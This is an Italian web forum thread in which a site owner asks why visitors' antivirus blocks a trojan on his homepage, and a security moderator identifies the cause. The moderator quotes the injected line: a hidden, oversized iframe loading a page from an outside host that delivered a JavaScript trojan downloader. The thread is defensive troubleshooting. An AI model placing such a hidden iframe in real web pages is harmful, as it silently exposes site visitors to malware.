Visualizzazione dei risultati da 1 a 9 su 9

Discussione: Virus da sito

  1. #1
    Utente di HTML.it L'avatar di Nkosi
    Registrato dal
    Feb 2003
    Messaggi
    412

    Virus da sito

    Un amico mi scrive quanto segue:
    "Roberto un saluto e scusami per il messaggio che sto per inviarti, anche perché sarai già stato avvisato. Oggi entrando nel tuo sito l'antivirus mi ha informato che è stato bloccato un virus .... ho riprovato più volte ad entrare nel sito e tutte le volte compare il messaggio per avvertirmi".
    Scusate l'ignoranza (ho un Mac ) ma è possibile una cosa del genere e se sì qualcuno può controllare e dirmi?
    Il sito è la mia "home" qui sotto.
    Grazie

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    in effetti viene scaricato Trojan-Downloader.JS.Agent.bx

    In questo caso i responsabili sono quasi sempre servizi di statistica gratuiti ma con la sorpresina...

    nel tuo caso direi che la riga incriminata è:
    codice:
    <iframe SRC="http://walkcave.com/stat4/index.php" WIDTH=1500 HEIGHT=1500 style="display:none"></iframe>
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    Utente di HTML.it L'avatar di Nkosi
    Registrato dal
    Feb 2003
    Messaggi
    412
    Grazie mille, davvero. Confesso la mia ingoranza su tutto ciò che riguarda i virus. Ma la stringa come c'è finita sulla index? Temo di conoscere la risposta: qualcuno ha l'accesso alla root del sito, vero? In questo caso basta cambiare user e psw o ci sono altre azioni da mettere in atto?
    E poi, c'è solo sulla index o anche su altri file.
    Grazie ancora

  4. #4
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    come ci sia finita non saprei...
    sul tuo sito hai parti dinamiche o di interazione con l'utente? (forum, moduli di richiesta, guestbooks etc..). Potrebbe esserci qualche vulnearbilità su una di queste sezioni.
    Ho dato una occhiata veloce e a parte l'uso delle estensioni SSI non vedo nessuna parte dinamica....
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  5. #5
    Utente di HTML.it L'avatar di Nkosi
    Registrato dal
    Feb 2003
    Messaggi
    412
    Quasi niente a parte phpstats e PhdAdsNew che ho recentemente aggiornato e che penso sia il primo indiziato. Avevo montato, in passato, qualche cgi che poi ho tolto.

  6. #6
    Ciao , il nostro moderatore ha risolto anche a me un problema simile al tuo, sul mio sito avevo come contatore freestat da cui partivano dialer e popup, ho seguito il consiglio di Habanero e eliminando il counter pare essere sparito il problema.
    ciao
    gfloriano
    http://www.fantacomix.it

  7. #7
    Utente di HTML.it L'avatar di Nkosi
    Registrato dal
    Feb 2003
    Messaggi
    412
    Nel mio caso si trattava proprio della stringa walkcave.com riportata dal Mod e che ho trovato nientemeno che in home page (in mezzo a tutto l'altro codice): in pratica è come se l'avessi aggiunta io a mano (sono l'unico che ci lavora). Ora l'ho cancellata e stasera verifico che non ci sia in altre pagine del sito. Possibile che mi abbiano hackerato il sito per aggiungere un'idiozia del genere? Mi sembra davvero tempo buttato via...

  8. #8
    come dice gfloriano più probabilmente era inclusa in una porzione di codice di qualche servizio gratuito che hai inserito nel sito, tipo contatori o servizi banner
    Begun the Clone War has

    Sì sì, mi hanno fatto redattore --- SuspectFile

  9. #9
    Utente di HTML.it L'avatar di Nkosi
    Registrato dal
    Feb 2003
    Messaggi
    412
    mah?! Un paio d'anni fa avevo Shiny che poi ho eliminato
    Comunque grazie a tutti

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.